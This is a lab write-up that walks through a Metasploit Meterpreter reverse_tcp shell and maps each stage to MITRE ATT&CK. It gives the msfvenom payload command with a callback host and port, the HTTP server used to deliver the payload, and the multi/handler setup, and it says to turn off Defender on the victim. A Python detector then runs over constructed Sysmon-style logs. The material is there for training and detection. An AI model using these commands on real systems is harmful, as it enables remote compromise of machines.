We simulate a basic Metasploit reverse_tcp (Meterpreter) shell end to end, map each stage to the MITRE ATT&CK framework, and look at how the activity can be detected.

Weaponization

| Tactic | Technique | Sub-technique |
|---|---|---|
| TA0042: Resource Development | T1587: Develop Capabilities | T1587.001: Malware |

Generate a staged Meterpreter reverse_tcp executable that calls back to the attacker host at 10.10.30.100 on port 4444:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.30.100 LPORT=4444 -f exe > shell.exe

Delivery

| Tactic | Technique | Sub-technique |
|---|---|---|
| TA0042: Resource Development | T1608: Stage Capabilities | T1608.001: Upload Malware |
| TA0011: Command and Control | T1105: Ingress Tool Transfer | No sub-techniques |

Disable Windows Defender on the victim before running this. The payload is a stock, unencoded msfvenom executable, so Defender's signatures will flag it on download; this exercise is about the shell and its detection, not about evasion.

On the attacker host, serve shell.exe over HTTP from the directory it was written to, so the victim can fetch it (T1105):

python3 -m http.server 80


Still on the attacker host, start the multi/handler with the same payload, LHOST and LPORT used in msfvenom, so it is listening before the victim runs the file:

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.30.100
set LPORT 4444
run

Exploitation

The victim downloads and runs shell.exe (T1204.002). The executable connects back to the handler on port 4444, a port with no standard service assigned to it (T1571), and the Meterpreter session that results is the C2 channel. Basic host enumeration from that session maps to T1082.

| Tactic | Technique | Sub-technique |
|---|---|---|
| TA0002: Execution | T1204: User Execution | T1204.002: Malicious File |
| TA0011: Command and Control | T1095: Non-Application Layer Protocol | No sub-techniques |
| TA0011: Command and Control | T1571: Non-Standard Port | No sub-techniques |
| TA0007: Discovery | T1082: System Information Discovery | No sub-techniques |



Detection

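As an added example (not part of the original write-up), the following Python script shows the kind of detection logic a defender could apply to endpoint network-connection telemetry for this scenario. It runs over constructed, Sysmon-style Event ID 3 (NetworkConnect) records: the field names follow Sysmon, but the flat key=value line layout and every value in the sample are made up here. It flags outbound TCP connections that match the handler configured above (10.10.30.100:4444), or that come from an executable in a user-writable directory to a port outside a short allow-list of common service ports (T1571). The allow-list, the directory markers and the two-condition rule are assumptions made for this example, not a vetted production rule.

```python
"""Toy reverse-shell callback detector over constructed Sysmon-style records.

Added example, not code from the original page. Field names follow Sysmon
Event ID 3 (NetworkConnect); the flat ``key=value`` line layout and all of
the sample values below are constructed for this example.
"""
import re

# Indicators taken from the handler configured on the page (LHOST / LPORT).
KNOWN_C2_HOST = "10.10.30.100"
KNOWN_C2_PORT = 4444

# Assumed allow-list of ports on which outbound TCP is unremarkable; anything
# else is treated as a non-standard port (ATT&CK T1571).
COMMON_PORTS = {22, 25, 53, 80, 443, 445, 587, 993, 995, 3389, 8080}

# Assumed path fragments that mark a user-writable location, the usual home of
# a payload a user was tricked into running (T1204.002).
USER_WRITABLE_MARKERS = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")

# Constructed sample telemetry (not real logs). Record 2 is the callback from
# the page's shell.exe; record 5 is a second suspicious binary; the rest are
# benign, including a per-user app (OneDrive) that talks to 443 from AppData.
SAMPLE_EVENTS = [
    "UtcTime=2025-06-10 11:20:01 Image=C:\\Windows\\System32\\svchost.exe "
    "ProcessId=1120 Protocol=tcp Initiated=true SourceIp=10.10.30.55 "
    "SourcePort=49731 DestinationIp=10.10.30.5 DestinationPort=443",
    "UtcTime=2025-06-10 11:23:06 Image=C:\\Users\\victim\\Downloads\\shell.exe "
    "ProcessId=5412 Protocol=tcp Initiated=true SourceIp=10.10.30.55 "
    "SourcePort=49802 DestinationIp=10.10.30.100 DestinationPort=4444",
    "UtcTime=2025-06-10 11:23:40 Image=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe "
    "ProcessId=3300 Protocol=tcp Initiated=true SourceIp=10.10.30.55 "
    "SourcePort=49810 DestinationIp=203.0.113.10 DestinationPort=443",
    "UtcTime=2025-06-10 11:24:12 Image=C:\\Users\\victim\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe "
    "ProcessId=4100 Protocol=tcp Initiated=true SourceIp=10.10.30.55 "
    "SourcePort=49815 DestinationIp=203.0.113.20 DestinationPort=443",
    "UtcTime=2025-06-10 11:25:03 Image=C:\\Users\\victim\\AppData\\Local\\Temp\\updater.exe "
    "ProcessId=6020 Protocol=tcp Initiated=true SourceIp=10.10.30.55 "
    "SourcePort=49830 DestinationIp=203.0.113.7 DestinationPort=8443",
]


def parse_event(line: str) -> dict:
    """Split a flat key=value record into a dict.

    Splitting only before a ``Key=`` token keeps spaces inside values (the
    timestamp and ``Program Files`` paths) intact.
    """
    fields = {}
    for token in re.split(r" (?=\w+=)", line.strip()):
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def analyze_event(ev: dict) -> list:
    """Return the reasons this record looks like a reverse-shell callback.

    An empty list means the connection is not flagged. Only outbound TCP is
    considered, since that is what a reverse_tcp payload produces.
    """
    if ev.get("Protocol") != "tcp" or ev.get("Initiated") != "true":
        return []
    reasons = []
    dst_ip = ev.get("DestinationIp", "")
    dst_port = int(ev.get("DestinationPort", 0))
    image = ev.get("Image", "").lower()

    # Strong indicator: the exact handler address and port from the exercise.
    if dst_ip == KNOWN_C2_HOST and dst_port == KNOWN_C2_PORT:
        reasons.append(f"connection to known handler {KNOWN_C2_HOST}:{KNOWN_C2_PORT}")

    # Behavioural indicator: user-writable binary on a non-standard port.
    # Requiring both conditions keeps per-user apps on 443 out of the alerts.
    nonstandard_port = dst_port not in COMMON_PORTS
    user_writable = any(marker in image for marker in USER_WRITABLE_MARKERS)
    if nonstandard_port and user_writable:
        reasons.append(
            f"binary in user-writable path using non-standard port {dst_port} (T1571)"
        )
    return reasons


def detect(lines) -> list:
    """Run analyze_event over raw records and collect the alerts, in log order."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        reasons = analyze_event(ev)
        if reasons:
            alerts.append({
                "time": ev["UtcTime"],
                "image": ev["Image"],
                "dest": f"{ev['DestinationIp']}:{ev['DestinationPort']}",
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[ALERT] {alert['time']} {alert['image']} -> {alert['dest']}")
        for reason in alert["reasons"]:
            print(f"         - {reason}")
```

Running the script prints two alerts: the shell.exe callback (matched both by the known handler address and by the behavioural rule) and the Temp-directory updater on 8443. The svchost.exe, chrome.exe and OneDrive.exe records are left alone, which shows why the user-path heuristic is paired with the port check rather than used on its own. In a real environment the same logic would be written as a SIEM query over Sysmon Event ID 3 or Windows Security event 5156 rather than as a standalone script.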


Mitigations/Detections